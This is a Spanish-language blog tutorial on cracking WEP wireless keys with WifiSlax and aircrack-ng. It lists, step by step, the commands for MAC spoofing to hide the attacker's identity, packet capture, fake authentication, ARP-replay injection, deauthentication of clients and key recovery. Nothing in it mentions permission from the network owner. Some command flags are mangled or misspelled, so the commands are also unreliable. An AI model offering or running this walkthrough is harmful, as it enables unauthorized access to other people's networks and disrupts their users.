Wifislax tutorial

Wifislax tutorial

WiFiSlax Manual

Este pequeño manual esta hecho para recuperar claves WEP con WifiSlax y tarjeta PCMCIA con chipset Atheros.

Habilitar tarjeta CardBus:

K/WifiSlax/Asistencia chipset Atheros/Crear interface (Modo monitor)

Conocer cual es nuestra clave MAC: 00:01:02:03:04:05

Por cuestiones de seguridad te recomiendo cambiar clave MAC

K/WifiSlax/Herramientas Wireless/Cambiar MAC (macchanger)
Por ejemplo: 00:11:22:33:44:55

Habilitar Modo Monitor con Airmon-ng:

K/WifiSlax/Suite Actual/Habilitación modo monitor (Airmon-ng-me)

Nota: a partir de este punto todas las consolas que abras deben de permanecer abiertas hasta la recuperación de la clave WEP.

Habilitar Modo Monitor:
Abrir una consola y teclear el siguiente comando:

airodump-ng –w captura –c 11 ath0

Donde:
Captura es el nombre del archivo en donde se guardará la captura de paquetes (captura-01.cap)
11 es el canal donde vamos a buscar las WiFi (desde 1 hasta 12)

Asociar con el Access Point o Ruteador:
Abrir una consola y teclear el siguiente comando:

aireplay-ng ath0 –fakeauth 135 –e Nombre del AP -a 00:01:02:03:04:05 -h 00:11:22:33:44:55/0:1:2:3:4:5

Donde:
–fakeauth 135: es el comando de ataque de asociación
-e Nombre del AP: Nombre del AP o Router cliente del cual se recuperará la clave WEP
-a 00:01:02:03:04:05 : dirección MAC del AP o Router cliente del cual se recuperará la clave WEP
-h 00:11:22:33:44:55 : MAC de nuestra tarjeta WiFi
Nota importante: Cuando puede hacer la autenticación te marca Authentication 🙂 (Hasta aquí vamos bien)

Inyección de Paquetes:
Abrir una consola y teclear el siguiente comando:

aireplay-ng ath0 –arpreplay –e Nombre del AP –b 00:01:02:03:04:05 -h 00:11:22:33:44:55/0:1:2:3:4:5 –x 952

Donde:
–arpleplay: es el comando de ataque de inyección de paquetes
-e Nombre del AP: Nombre del AP o Router cliente del cual se recuperará la clave WEP
-b 00:01:02:03:04:05 : dirección MAC del AP o Router cliente del cual se recuperará la clave WEP
-h 00:11:22:33:44:55 : MAC de nuestra tarjeta WiFi

Usar este comando en dado caso que el anterior no funcione:

Inyección de Paquetes:
Abrir una consola y teclear el siguiente comando:

aireplay-ng ath0 -3 –b 00:01:02:03:04:05 -h 00:11:22:33:44:55 ath0

Ataque –deauth:
Abrir una consola y teclear el siguiente comando:

aireplay-ng ath0 –deauth 0 –e Nombre del AP -a 00:01:02:03:04:05 -h 00:11:22:33:44:55/0:1:2:3:4:5

Donde:
–deauth: es el comando de ataque para generar mayor cantidad de IVS
-e Nombre del AP: Nombre del AP o Router cliente del cual se recuperará la clave WEP
-a 00:01:02:03:04:05 : dirección MAC del AP o Router cliente del cual se recuperará la clave WEP
-h 00:11:22:33:44:55 : MAC de nuestra tarjeta WiFi

Antes de lanzar el siguiente comando es recomendable tener una mínima inyección de paquetes, digamos unos 300 mil.

Obtener clave WEP:
Abrir una consola y teclear el siguiente comando:

aircrack-ng –a 1 -i 1 –n 64 captura-01.cap ath0

Nota: en caso de que no se obtenga la clave WEP, dejar que se acumulen mayor número de paquetes y volverlo a intentar mas tarde.

 

También te podría gustar...

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *